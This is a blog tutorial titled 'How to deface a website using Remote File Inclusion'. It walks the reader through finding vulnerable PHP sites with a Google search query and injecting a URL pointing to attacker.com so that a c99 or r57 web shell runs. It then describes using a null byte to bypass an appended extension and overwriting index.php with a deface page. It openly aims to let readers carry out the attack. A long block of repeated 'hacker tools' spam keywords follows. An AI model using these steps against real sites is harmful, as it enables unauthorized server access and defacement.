HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
- Black Hat Hacker Tools
- Hacker Tools Free Download
- Nsa Hack Tools
- Wifi Hacker Tools For Windows
- Pentest Tools For Ubuntu
- Pentest Tools Framework
- Pentest Tools Website
- Hack Tools 2019
- Hacker Techniques Tools And Incident Handling
- Hacker Techniques Tools And Incident Handling
- Pentest Tools Nmap
- Hackers Toolbox
- Pentest Tools Download
- Hack Tools For Mac
- Best Pentesting Tools 2018
- Hacker Security Tools
- Pentest Tools Linux
- Computer Hacker
- Hack App
- Pentest Box Tools Download
- Termux Hacking Tools 2019
- Ethical Hacker Tools
- Pentest Tools Review
- Hacking Tools Usb
- Hacker Tools For Mac
- Pentest Tools Tcp Port Scanner
- Pentest Tools Open Source
- Hacking Tools Windows 10
- Hacking Tools 2019
- Hacking Tools
- What Is Hacking Tools
- Hacker Tool Kit
- Top Pentest Tools
- Hacking Tools For Kali Linux
- Kik Hack Tools
- Hacking Tools Github
- Hack And Tools
- Hacker Tools Free Download
- Nsa Hack Tools
- Pentest Tools Windows
- Hacker Search Tools
- Pentest Tools Website
- Hacking Tools Mac
- Hacker Tools 2019
- Hacking Tools For Pc
- Termux Hacking Tools 2019
- Bluetooth Hacking Tools Kali
- Pentest Tools For Windows
- Pentest Recon Tools
- Hacker Tools For Mac
- Pentest Tools Find Subdomains
- Hack Tools Pc
- Free Pentest Tools For Windows
- Hacker Tools Free
- Hack Tools For Pc
- Hacker Tools Hardware
- How To Install Pentest Tools In Ubuntu
- Black Hat Hacker Tools
- Hacker Tools Github
- Hacking Tools Mac
- Hacking Tools Download
- Hacker Tools Hardware
- Growth Hacker Tools
- Blackhat Hacker Tools
- Pentest Tools Review
- Hacking Tools For Beginners
- Hacker Tools Github
- Hack Tools For Pc
- Pentest Tools Url Fuzzer
- Best Hacking Tools 2020
- Pentest Tools Bluekeep
- Free Pentest Tools For Windows
- Hacker
- Nsa Hack Tools
- Hacker Tools Hardware
- Nsa Hacker Tools
- Hack Tool Apk No Root
- Pentest Tools Android
- Pentest Reporting Tools
- Pentest Tools Find Subdomains
- Hacking Tools For Mac
- Hak5 Tools
- Computer Hacker
- Hacker Tools For Pc
- Pentest Tools Free
- Pentest Tools Open Source
- Hack Tools 2019
- Hack App
- Hacker Tools Apk Download
- New Hacker Tools
- Pentest Tools List
- Hacker Tools Free Download
- Hacker Hardware Tools
- Hacker Tools Mac
- World No 1 Hacker Software
- Hak5 Tools
- Top Pentest Tools
- Best Pentesting Tools 2018
- Pentest Box Tools Download
- Pentest Tools Website Vulnerability
- Hacking Tools Online
- Hacking Tools For Mac
- Pentest Box Tools Download
- Pentest Tools Open Source
- Black Hat Hacker Tools
- Pentest Box Tools Download
- Usb Pentest Tools
- Hack Tools
- Pentest Automation Tools
- Hackers Toolbox
- Pentest Tools Subdomain
- Hacker Hardware Tools
- Pentest Tools Website
- Hack Tools
- Hacker Tools For Mac
- Pentest Tools Find Subdomains
- Hacking Tools
- Hacker Tools 2020
- Hacker Techniques Tools And Incident Handling
- Termux Hacking Tools 2019
- Hacking Apps
- Hacker Search Tools
- Physical Pentest Tools
- Hacker Tools Online
- Hacking Tools For Mac
- Github Hacking Tools
- Hack Tools Mac
ليست هناك تعليقات:
إرسال تعليق